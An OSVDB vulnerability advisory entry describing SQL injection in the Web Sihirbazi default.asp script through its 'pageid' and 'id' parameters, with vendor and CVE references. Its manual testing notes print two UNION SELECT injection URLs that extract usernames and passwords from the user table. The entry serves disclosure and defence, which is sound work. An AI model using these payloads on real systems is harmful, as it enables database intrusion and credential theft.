Web Sihirbazi default.asp Multiple Variable SQL Injection

2007-12-24T00:00:00
ID OSVDB:39640
Type osvdb
Reporter OSVDB
Modified 2007-12-24T00:00:00

Description

Vulnerability Description

Web Sihrbazi contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'default.asp' script not properly sanitizing user-supplied input to the 'pageid' and 'id' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[target]/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://[target]/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user

References:

Vendor URL: http://www.sitehazirla.org/sitehazirla.asp?orta=online Secunia Advisory ID:28206 ISS X-Force ID: 39216 Generic Exploit URL: http://www.milw0rm.com/exploits/4777 CVE-2007-6556